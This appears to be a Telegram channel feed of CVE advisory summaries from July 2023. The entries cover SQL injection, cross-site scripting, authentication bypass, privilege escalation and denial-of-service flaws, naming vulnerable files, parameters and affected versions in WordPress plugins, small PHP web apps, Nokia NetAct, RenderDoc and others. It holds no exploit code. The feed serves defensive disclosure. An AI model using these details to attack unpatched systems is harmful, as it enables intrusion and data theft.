🚨 CVE-2023-3871A vulnerability classified as critical has been found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/edit_category.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235233 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 14:58:13 |
🚨 CVE-2023-22428Improper privilege validation in Command Centre Server allows authenticated operators to modify Division lineage.This issue affects Command Centre: vEL8.80 prior to vEL8.80.1192 (MR2), vEL8.70 prior to vEL8.70.2185 (MR4), vEL8.60 prior to vEL8.60.2347 (MR6), vEL8.50 prior to vEL8.50.2831(MR8), vEL8.40 and prior.🎖@cveNotify |
|
| 2023-07-25 14:58:12 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2023-07-25 13:58:13 |
🚨 CVE-2023-3897User enumeration in On-premise SureMDM Solution on Windows deployment allows attacker to enumerate local user information via error message.This issue affects SureMDM On-premise: 6.31 and below versions 🎖@cveNotify |
|
| 2023-07-25 10:58:46 |
🚨 CVE-2023-34434Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0. The attacker could bypass the current logic and achieve arbitrary file reading. To solve it, users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8130 .🎖@cveNotify |
|
| 2023-07-25 10:58:44 |
🚨 CVE-2023-35088Improper Neutralization of Special Elements Used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong.This issue affects Apache InLong: from 1.4.0 through 1.7.0. In the toAuditCkSql method, the groupId, streamId, auditId, and dt are directly concatenated into the SQL query statement, which may lead to SQL injection attacks.Users are advised to upgrade to Apache InLong's 1.8.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/8198 🎖@cveNotify |
|
| 2023-07-25 10:58:42 |
🚨 CVE-2023-3886A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/invoice.php. The manipulation of the argument inv_id leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235248.🎖@cveNotify |
|
| 2023-07-25 10:58:41 |
🚨 CVE-2023-3887A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/search-appointment.php. The manipulation of the argument searchdata leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235249 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 10:58:39 |
🚨 CVE-2023-3888A vulnerability was found in Campcodes Beauty Salon Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin/admin-profile.php. The manipulation of the argument adminname leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-235250 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-25 10:58:37 |
🚨 CVE-2022-2083The Simple Single Sign On WordPress plugin through 4.1.0 leaks its OAuth client_secret, which could be used by attackers to gain unauthorized access to the site.🎖@cveNotify |
|
| 2023-07-25 10:58:35 |
🚨 CVE-2022-1551The SP Project & Document Manager WordPress plugin before 4.58 uses an easily guessable path to store user files, bad actors could use that to access other users' sensitive files.🎖@cveNotify |
|
| 2023-07-25 10:58:33 |
🚨 CVE-2022-1412The Log WP_Mail WordPress plugin through 0.1 saves sent email in a publicly accessible directory using predictable filenames, allowing any unauthenticated visitor to obtain potentially sensitive information like generated passwords.🎖@cveNotify |
|
| 2023-07-25 10:58:32 |
🚨 CVE-2022-0828The Download Manager WordPress plugin before 3.2.34 uses the uniqid php function to generate the master key for a download, allowing an attacker to brute force the key with reasonable resources giving direct download access regardless of role based restrictions or password protections set for the download.🎖@cveNotify |
|
| 2023-07-25 10:58:30 |
🚨 CVE-2022-0837The Amelia WordPress plugin before 1.0.48 does not have proper authorisation when handling Amelia SMS service, allowing any customer to send paid test SMS notification as well as retrieve sensitive information about the admin, such as the email, account balance and payment history. A malicious actor can abuse this vulnerability to drain out the account balance by keep sending SMS notification.🎖@cveNotify |
|
| 2023-07-25 10:58:29 |
🚨 CVE-2023-35066Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Infodrom Software E-Invoice Approval System allows SQL Injection.This issue affects E-Invoice Approval System: before v.20230701.🎖@cveNotify |
|
| 2023-07-25 10:58:27 |
🚨 CVE-2023-35067Plaintext Storage of a Password vulnerability in Infodrom Software E-Invoice Approval System allows Read Sensitive Strings Within an Executable.This issue affects E-Invoice Approval System: before v.20230701.🎖@cveNotify |
|
| 2023-07-25 10:58:26 |
🚨 CVE-2023-35078Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.🎖@cveNotify |
|
| 2023-07-25 10:58:24 |
🚨 CVE-2023-3885A vulnerability was found in Campcodes Beauty Salon Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /admin/edit_category.php. The manipulation of the argument id leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235247.🎖@cveNotify |
|
| 2023-07-25 10:58:23 |
🚨 CVE-2023-33863SerialiseValue in RenderDoc before 1.27 allows an Integer Overflow with a resultant Buffer Overflow. 0xffffffff is sign-extended to 0xffffffffffffffff (SIZE_MAX) and then there is an attempt to add 1.🎖@cveNotify |
|
| 2023-07-25 10:58:21 |
🚨 CVE-2023-33864StreamReader::ReadFromExternal in RenderDoc before 1.27 allows an Integer Overflow with a resultant Buffer Overflow. It uses uint32_t(m_BufferSize-m_InputSize) even though m_InputSize can exceed m_BufferSize.🎖@cveNotify |
|
| 2023-07-25 10:58:20 |
🚨 CVE-2023-33865RenderDoc before 1.27 allows local privilege escalation via a symlink attack. It relies on the /tmp/RenderDoc directory regardless of ownership.🎖@cveNotify |
|
| 2023-07-25 10:58:18 |
🚨 CVE-2023-32637** UNSUPPPORTED WHEN ASSIGNED ** GBrowse accepts files with any formats uploaded and places them in the area accessible through unauthenticated web requests. Therefore, anyone who can upload files through the product may execute arbitrary code on the server.🎖@cveNotify |
|
| 2023-07-25 10:58:17 |
🚨 CVE-2023-3046Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Biltay Technology Scienta allows SQL Injection.This issue affects Scienta: before 20230630.1953.🎖@cveNotify |
|
| 2023-07-25 10:58:15 |
🚨 CVE-2023-3883A vulnerability, which was classified as problematic, was found in Campcodes Beauty Salon Management System 1.0. This affects an unknown part of the file /admin/add-category.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-235245 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-24 16:58:20 |
🚨 CVE-2023-3863A use-after-free flaw was found in nfc_llcp_find_local in net/nfc/llcp_core.c in NFC in the Linux kernel. This flaw allows a local user with special privileges to impact a kernel information leak issue.🎖@cveNotify |
|
| 2023-07-24 16:58:16 |
🚨 CVE-2022-28863An issue was discovered in Nokia NetAct 22. A remote user, authenticated to the website, can visit the Site Configuration Tool section and arbitrarily upload potentially dangerous files without restrictions via the /netact/sct dir parameter in conjunction with the operation=upload value.🎖@cveNotify |
|
| 2023-07-24 16:58:15 |
🚨 CVE-2022-28865An issue was discovered in Nokia NetAct 22 through the Site Configuration Tool website section. A malicious user can change a filename of an uploaded file to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /netact/sct filename parameter is used.🎖@cveNotify |
|
| 2023-07-24 16:58:14 |
🚨 CVE-2022-28867An issue was discovered in Nokia NetAct 22 through the Administration of Measurements website section. A malicious user can edit or add the templateName parameter in order to include JavaScript code, which is then stored and executed by a victim's web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. Here, the /aom/html/EditTemplate.jsf and /aom/html/ViewAllTemplatesPage.jsf templateName parameter is used.🎖@cveNotify |
|
| 2023-07-24 16:58:13 |
🚨 CVE-2022-30280/SecurityManagement/html/createuser.jsf in Nokia NetAct 22 allows CSRF. A remote attacker is able to create users with arbitrary privileges, even administrative privileges. The application (even if it implements a CSRF token for the random GET request) does not ever verify a CSRF token. With a little help of social engineering/phishing (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.🎖@cveNotify |
|
| 2023-07-24 15:58:46 |
🚨 CVE-2021-39191mod_auth_openidc is an authentication/authorization module for the Apache 2.x HTTP server that functions as an OpenID Connect Relying Party, authenticating users against an OpenID Connect Provider. In versions prior to 2.4.9.4, the 3rd-party init SSO functionality of mod_auth_openidc was reported to be vulnerable to an open redirect attack by supplying a crafted URL in the `target_link_uri` parameter. A patch in version 2.4.9.4 made it so that the `OIDCRedirectURLsAllowed` setting must be applied to the `target_link_uri` parameter. There are no known workarounds aside from upgrading to a patched version.🎖@cveNotify |
|
| 2023-07-24 15:58:44 |
🚨 CVE-2022-21933ASUS VivoMini/Mini PC device has an improper input validation vulnerability. A local attacker with system privilege can use system management interrupt (SMI) to modify memory, resulting in arbitrary code execution for controlling the system or disrupting service.🎖@cveNotify |
|
| 2023-07-24 15:58:42 |
🚨 CVE-2022-22155An Uncontrolled Resource Consumption vulnerability in the handling of IPv6 neighbor state change events in Juniper Networks Junos OS allows an adjacent attacker to cause a memory leak in the Flexible PIC Concentrator (FPC) of an ACX5448 router. The continuous flapping of an IPv6 neighbor with specific timing will cause the FPC to run out of resources, leading to a Denial of Service (DoS) condition. Once the condition occurs, further packet processing will be impacted, creating a sustained Denial of Service (DoS) condition, requiring a manual PFE restart to restore service. The following error messages will be seen after the FPC resources have been exhausted: fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 fpc0 DNX_NH::dnx_nh_tag_ipv4_hw_install(),3135: dnx_nh_tag_ipv4_hw_install: BCM L3 Egress create object failed for NH 602 (-14:No resources for operation), BCM NH Params: unit:0 Port:41, L3_INTF:0 Flags: 0x40 This issue only affects the ACX5448 router. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS on ACX5448: 18.4 versions prior to 18.4R3-S10; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S8, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2.🎖@cveNotify |
|
| 2023-07-24 15:58:40 |
🚨 CVE-2022-21689OnionShare is an open source tool that lets you securely and anonymously share files, host websites, and chat with friends using the Tor network. In affected versions the receive mode limits concurrent uploads to 100 per second and blocks other uploads in the same second, which can be triggered by a simple script. An adversary with access to the receive mode can block file upload for others. There is no way to block this attack in public mode due to the anonymity properties of the tor network.🎖@cveNotify |
|
| 2023-07-24 15:58:38 |
🚨 CVE-2022-21817NVIDIA Omniverse Launcher contains a Cross-Origin Resource Sharing (CORS) vulnerability which can allow an unprivileged remote attacker, if they can get user to browse malicious site, to acquire access tokens allowing them to access resources in other security domains, which may lead to code execution, escalation of privileges, and impact to confidentiality and integrity.🎖@cveNotify |
|
| 2023-07-24 15:58:36 |
🚨 CVE-2021-41571In Apache Pulsar it is possible to access data from BookKeeper that does not belong to the topics accessible by the authenticated user. The Admin API get-message-by-id requires the user to input a topic and a ledger id. The ledger id is a pointer to the data, and it is supposed to be a valid it for the topic. Authorisation controls are performed against the topic name and there is not proper validation the that ledger id is valid in the context of such ledger. So it may happen that the user is able to read from a ledger that contains data owned by another tenant. This issue affects Apache Pulsar Apache Pulsar version 2.8.0 and prior versions; Apache Pulsar version 2.7.3 and prior versions; Apache Pulsar version 2.6.4 and prior versions.🎖@cveNotify |
|
| 2023-07-24 15:58:34 |
🚨 CVE-2022-21721Next.js is a React framework. Starting with version 12.0.0 and prior to version 12.0.9, vulnerable code could allow a bad actor to trigger a denial of service attack for anyone using i18n functionality. In order to be affected by this CVE, one must use next start or a custom server and the built-in i18n support. Deployments on Vercel, along with similar environments where invalid requests are filtered before reaching Next.js, are not affected. A patch has been released, `next@12.0.9`, that mitigates this issue. As a workaround, one may ensure `/${locale}/_next/` is blocked from reaching the Next.js instance until it becomes feasible to upgrade.🎖@cveNotify |
|
| 2023-07-24 15:58:32 |
🚨 CVE-2022-21217An out-of-bounds write vulnerability exists in the device TestEmail functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted network request can lead to an out-of-bounds write. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-24 15:58:31 |
🚨 CVE-2022-21796A memory corruption vulnerability exists in the netserver parse_command_list functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to an out-of-bounds write. An attacker can send an HTTP request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-07-24 15:58:29 |
🚨 CVE-2022-21707wasmCloud Host Runtime is a server process that securely hosts and provides dispatch for web assembly (WASM) actors and capability providers. In versions prior to 0.52.2 actors can bypass capability authorization. Actors are normally required to declare their capabilities for inbound invocations, but with this vulnerability actor capability claims are not verified upon receiving invocations. This compromises the security model for actors as they can receive unauthorized invocations from linked capability providers. The problem has been patched in versions `0.52.2` and greater. There is no workaround and users are advised to upgrade to an unaffected version as soon as possible.🎖@cveNotify |
|
| 2023-07-24 15:58:27 |
🚨 CVE-2022-21708graphql-go is a GraphQL server with a focus on ease of use. In versions prior to 1.3.0 there exists a DoS vulnerability that is possible due to a bug in the library that would allow an attacker with specifically designed queries to cause stack overflow panics. Any user with access to the GraphQL handler can send these queries and cause stack overflows. This in turn could potentially compromise the ability of the server to serve data to its users. The issue has been patched in version `v1.3.0`. The only known workaround for this issue is to disable the `graphql.MaxDepth` option from your schema which is not recommended.🎖@cveNotify |
|
| 2023-07-24 15:58:26 |
🚨 CVE-2022-21656Envoy is an open source edge and service proxy, designed for cloud-native applications. The default_validator.cc implementation used to implement the default certificate validation routines has a "type confusion" bug when processing subjectAltNames. This processing allows, for example, an rfc822Name or uniformResourceIndicator to be authenticated as a domain name. This confusion allows for the bypassing of nameConstraints, as processed by the underlying OpenSSL/BoringSSL implementation, exposing the possibility of impersonation of arbitrary servers. As a result Envoy will trust upstream certificates that should not be trusted.🎖@cveNotify |
|
| 2023-07-24 15:58:24 |
🚨 CVE-2022-23654Wiki.js is a wiki app built on Node.js. In affected versions an authenticated user with write access on a restricted set of paths can update a page outside the allowed paths by specifying a different target page ID while keeping the path intact. The access control incorrectly check the path access against the user-provided values instead of the actual path associated to the page ID. Commit https://github.com/Requarks/wiki/commit/411802ec2f654bb5ed1126c307575b81e2361c6b fixes this vulnerability by checking access control on the path associated with the page ID instead of the user-provided value. When the path is different than the current value, a second access control check is then performed on the user-provided path before the move operation.🎖@cveNotify |
|
| 2023-07-24 15:58:22 |
🚨 CVE-2022-21196MMP: All versions prior to v1.0.3, PTP C-series: Device versions prior to v2.8.6.1, and PTMP C-series and A5x: Device versions prior to v2.5.4.1 does not perform proper authorization and authentication checks on multiple API routes. An attacker may gain access to these API routes and achieve remote code execution, create a denial-of-service condition, and obtain sensitive information.🎖@cveNotify |
|
| 2023-07-24 15:58:20 |
🚨 CVE-2022-21800MMP: All versions prior to v1.0.3, PTP C-series: Device versions prior to v2.8.6.1, and PTMP C-series and A5x: Device versions prior to v2.5.4.1 uses the MD5 algorithm to hash the passwords before storing them but does not salt the hash. As a result, attackers may be able to crack the hashed passwords.🎖@cveNotify |
|
| 2023-07-24 15:58:19 |
🚨 CVE-2022-21698client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of `promhttp.InstrumentHandler*` middleware except `RequestsInFlight`; not filter any specific methods (e.g GET) before middleware; pass metric with `method` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown `method`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the `method` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.🎖@cveNotify |
|
| 2023-07-24 15:58:18 |
🚨 CVE-2022-20680A vulnerability in the web-based management interface of Cisco Prime Service Catalog could allow an authenticated, remote attacker to access sensitive information on an affected device. This vulnerability is due to improper enforcement of Administrator privilege levels for low-value sensitive data. An attacker with read-only Administrator access to the web-based management interface could exploit this vulnerability by sending a malicious HTTP request to the page that contains the sensitive data. A successful exploit could allow the attacker to collect sensitive information about users of the system and orders that have been placed using the application.🎖@cveNotify |
|
| 2023-07-24 15:58:17 |
🚨 CVE-2022-22528SAP Adaptive Server Enterprise (ASE) - version 16.0, installation makes an entry in the system PATH environment variable in Windows platform which, under certain conditions, allows a Standard User to execute malicious Windows binaries which may lead to privilege escalation on the local system. The issue is with the ASE installer and does not impact other ASE binaries.🎖@cveNotify |
|
| 2023-07-24 15:58:16 |
🚨 CVE-2022-22537When a user opens a manipulated Tagged Image File Format (.tiff, 2d.x3d)) received from untrusted sources in SAP 3D Visual Enterprise Viewer - version 9.0, the application crashes and becomes temporarily unavailable to the user until restart of the application. The file format details along with their CVE relevant information can be found below.🎖@cveNotify |
|
| 2023-07-24 12:58:37 |
🚨 CVE-2022-3907The Clerk WordPress plugin before 4.0.0 is affected by time-based attacks in the validation function for all API requests due to the usage of comparison operators to verify API keys against the ones stored in the site options.🎖@cveNotify |
|
| 2023-07-24 12:58:35 |
🚨 CVE-2022-3206The Passster WordPress plugin before 3.5.5.5.2 stores the password inside a cookie named "passster" using base64 encoding method which is easy to decode. This puts the password at risk in case the cookies get leaked.🎖@cveNotify |
|
| 2023-07-24 12:58:34 |
🚨 CVE-2022-3082The miniOrange Discord Integration WordPress plugin before 2.1.6 does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example🎖@cveNotify |
|
| 2023-07-24 12:58:33 |
🚨 CVE-2022-2834The Helpful WordPress plugin before 4.5.26 puts the exported logs and feedbacks in a publicly accessible location and guessable names, which could allow attackers to download them and retrieve sensitive information such as IP, Names and Email Address depending on the plugin's settings🎖@cveNotify |
|
| 2023-07-24 12:58:32 |
🚨 CVE-2022-2891The WP 2FA WordPress plugin before 2.3.0 uses comparison operators that don't mitigate time-based attacks, which could be abused to leak information about the authentication codes being compared.🎖@cveNotify |
|
| 2023-07-24 12:58:31 |
🚨 CVE-2022-0444The Backup, Restore and Migrate WordPress Sites With the XCloner Plugin WordPress plugin before 4.3.6 does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key.🎖@cveNotify |
|
| 2023-07-24 12:58:30 |
🚨 CVE-2022-0885The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.🎖@cveNotify |
|
| 2023-07-24 12:58:25 |
🚨 CVE-2022-0363The myCred WordPress plugin before 2.4.3.1 does not have any authorisation and CSRF checks in the mycred-tools-import-export AJAX action, allowing any authenticated users, such as subscribers, to call it and import mycred setup, thus creating badges, managing points or creating arbitrary posts.🎖@cveNotify |
|
| 2023-07-24 12:58:24 |
🚨 CVE-2022-0287The myCred WordPress plugin before 2.4.4.1 does not have any authorisation in place in its mycred-tools-select-user AJAX action, allowing any authenticated user, such as subscriber to call and retrieve all email addresses from the blog🎖@cveNotify |
|
| 2023-07-24 12:58:23 |
🚨 CVE-2022-0140The Visual Form Builder WordPress plugin before 3.0.6 does not perform access control on entry form export, allowing unauthenticated users to see the form entries or export it as a CSV File using the vfb-export endpoint.🎖@cveNotify |
|
| 2023-07-24 12:58:21 |
🚨 CVE-2022-0404The Material Design for Contact Form 7 WordPress plugin through 2.6.4 does not check authorization or that the option mentioned in the notice param belongs to the plugin when processing requests to the cf7md_dismiss_notice action, allowing any logged in user (with roles as low as Subscriber) to set arbitrary options to true, potentially leading to Denial of Service by breaking the site.🎖@cveNotify |
|
| 2023-07-24 12:58:17 |
🚨 CVE-2022-0229The miniOrange's Google Authenticator WordPress plugin before 5.5 does not have proper authorisation and CSRF checks when handling the reconfigureMethod, and does not validate the parameters passed to it properly. As a result, unauthenticated users could delete arbitrary options from the blog, making it unusable.🎖@cveNotify |
|
| 2023-07-24 12:58:16 |
🚨 CVE-2022-0345The Customize WordPress Emails and Alerts WordPress plugin before 1.8.7 does not have authorisation and CSRF check in its bnfw_search_users AJAX action, allowing any authenticated users to call it and query for user e-mail prefixes (finding the first letter, then the second one, then the third one etc.).🎖@cveNotify |
|
| 2023-07-24 12:58:15 |
🚨 CVE-2022-0377Users of the LearnPress WordPress plugin before 4.1.5 can upload an image as a profile avatar after the registration. After this process the user crops and saves the image. Then a "POST" request that contains user supplied name of the image is sent to the server for renaming and cropping of the image. As a result of this request, the name of the user-supplied image is changed with a MD5 value. This process can be conducted only when type of the image is JPG or PNG. An attacker can use this vulnerability in order to rename an arbitrary image file. By doing this, they could destroy the design of the web site.🎖@cveNotify |
|
| 2023-07-24 12:58:14 |
🚨 CVE-2022-0214The Custom Popup Builder WordPress plugin before 1.3.1 autoload data from its popup on every pages, as such data can be sent by unauthenticated user, and is not validated in length, this could cause a denial of service on the blog🎖@cveNotify |
|
| 2023-07-24 11:49:57 |
CVE Notify pinned «https://t.me/malwr» |
|
| 2023-07-24 11:49:44 |
https://t.me/malwr |
|
| 2023-07-24 10:58:13 |
🚨 CVE-2023-38057An improper input validation vulnerability in OTRS Survey modules allows any attacker with a link to a valid and unanswered survey request to inject javascript code in free text answers. This allows a cross site scripting attack while reading the replies as authenticated agent.This issue affects OTRS Survey module from 7.0.X before 7.0.32, from 8.0.X before 8.0.13 and ((OTRS)) Community Edition Survey module from 6.0.X through 6.0.22.🎖@cveNotify |
|
| 2023-07-24 10:58:12 |
🚨 CVE-2023-38060Improper Input Validation vulnerability in the ContentType parameter for attachments on TicketCreate or TicketUpdate operations of the OTRS Generic Interface modules allows any authenticated attacker to to perform an host header injection for the ContentType header of the attachment. This issue affects OTRS: from 7.0.X before 7.0.45, from 8.0.X before 8.0.35; ((OTRS)) Community Edition: from 6.0.1 through 6.0.34.🎖@cveNotify |
|
| 2023-07-24 10:58:11 |
🚨 CVE-2023-3139The Protect WP Admin WordPress plugin before 4.0 discloses the URL of the admin panel via a redirection of a crafted URL, bypassing the protection offered.🎖@cveNotify |
|
| 2023-07-24 05:58:19 |
🚨 CVE-2023-3862A vulnerability was found in Travelmate Travelable Trek Management Solution 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Comment Box Handler. The manipulation of the argument comment leads to cross site scripting. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. VDB-235214 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 05:58:18 |
🚨 CVE-2023-3861A vulnerability was found in phpscriptpoint Insurance 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /search.php. The manipulation leads to cross site scripting. The attack can be launched remotely. The identifier VDB-235213 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 05:58:14 |
🚨 CVE-2023-3859A vulnerability was found in phpscriptpoint Car Listing 1.6 and classified as critical. This issue affects some unknown processing of the file /search.php of the component GET Parameter Handler. The manipulation of the argument brand_id/model_id/car_condition/car_category_id/body_type_id/fuel_type_id/transmission_type_id/year/mileage_start/mileage_end/country/state/city leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235211. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 05:58:13 |
🚨 CVE-2023-3857A vulnerability, which was classified as problematic, was found in phpscriptpoint Ecommerce 1.15. This affects an unknown part of the file /product.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235209 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 05:58:12 |
🚨 CVE-2023-3855A vulnerability classified as problematic was found in phpscriptpoint JobSeeker 1.5. Affected by this vulnerability is an unknown functionality of the file /search-result.php. The manipulation of the argument kw/lc/ct/cp/p leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235207. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 00:58:28 |
🚨 CVE-2023-3853A vulnerability was found in phpscriptpoint BloodBank 1.1. It has been rated as problematic. This issue affects some unknown processing of the file page.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235205 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 00:58:27 |
🚨 CVE-2023-3854A vulnerability classified as critical has been found in phpscriptpoint BloodBank 1.1. Affected is an unknown function of the file /search of the component POST Parameter Handler. The manipulation of the argument country/city/blood_group_id leads to sql injection. It is possible to launch the attack remotely. VDB-235206 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-07-24 00:58:26 |
🚨 CVE-2023-3852A vulnerability was found in OpenRapid RapidCMS up to 1.3.1. It has been declared as critical. This vulnerability affects unknown code of the file /admin/upload.php. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 4dff387283060961c362d50105ff8da8ea40bcbe. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-235204.🎖@cveNotify |
|
| 2023-07-23 12:58:27 |
🚨 CVE-2023-28133Local privilege escalation in Checkpoint Endpoint Security (version E87.30) via crafted OpenSSL configuration file🎖@cveNotify |
|
| 2023-07-23 12:58:26 |
🚨 CVE-2023-3850A vulnerability has been found in SourceCodester Lost and Found Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /classes/Master.php?f=delete_category of the component HTTP POST Request Handler. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-235201 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-07-23 10:58:34 |
🚨 CVE-2023-3849A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-235200. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 10:58:33 |
🚨 CVE-2023-3847A vulnerability classified as problematic was found in mooSocial mooDating 1.2. This vulnerability affects unknown code of the file /users of the component URL Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. VDB-235198 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 10:58:32 |
🚨 CVE-2023-3848A vulnerability, which was classified as problematic, has been found in mooSocial mooDating 1.2. This issue affects some unknown processing of the file /users/view of the component URL Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-235199. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 10:58:31 |
🚨 CVE-2023-3846A vulnerability classified as problematic has been found in mooSocial mooDating 1.2. This affects an unknown part of the file /pages of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The identifier VDB-235197 was assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 10:58:30 |
🚨 CVE-2023-3844A vulnerability was found in mooSocial mooDating 1.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /friends of the component URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235195. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 10:58:29 |
🚨 CVE-2023-3845A vulnerability was found in mooSocial mooDating 1.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /friends/ajax_invite of the component URL Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235196. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.🎖@cveNotify |
|
| 2023-07-23 10:58:27 |
